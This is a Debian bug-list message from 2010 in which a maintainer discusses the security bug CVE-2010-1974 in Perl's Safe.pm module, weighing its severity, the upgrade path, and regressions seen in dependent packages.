forcemerge 582978 582806 thanks On Mon, May 24, 2010 at 08:36:39PM -0400, Michael Gilbert wrote: > Package: perl > Version: 5.10.1-12 > Severity: serious > Tags: security
I'm not totally convinced about the severity but let's leave it at 'serious' for now. > The following CVE (Common Vulnerabilities & Exposures) id was > published for perl. > > CVE-2010-1974[0]: > | Multiple unspecified vulnerabilities in the Safe (aka Safe.pm) module > | before 2.25 for Perl allow context-dependent attackers to inject and > | execute arbitrary code via vectors related to "automagic methods." > | NOTE: this might overlap CVE-2010-1169 or CVE-2010-1447. > The current version of perl in unstable has safe.pm 2.18, so that just > needs to be updated to version 2.25. If this is indeed considered 'serious', we need targeted fixes for a stable update as well. I'm rather concerned about possible regressions. I'm currently trying to come up with some test cases so that I could understand the risks better. Help would be welcome. I wasn't particularly well acquaintanced with Safe before this. Upstream is now at 2.27, which has further related changes and was also bundled with Perl 5.12.1. However, it causes regressions in (at least) libpetal-perl (#582805) and libtext-micromason-perl (#582892). These two regressions don't happen with 2.25. PostgreSQL has in the past used Safe.pm for its PL/perl extension, but recently moved away from it, apparently due to CVE-2010-1169. Quoting HISTORY in postgresql-8.4 (8.4.4-1): Recent developments have convinced us that "Safe.pm" is too insecure to rely on for making plperl trustable. FWIW, there seems to be a general agreement that Safe.pm is a "failed experiment". http://www.nntp.perl.org/group/perl.perl5.porters/2010/03/msg158034.html http://www.nntp.perl.org/group/perl.perl5.porters/2010/04/msg159471.html -- Niko Tyni nt...@debian.org -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org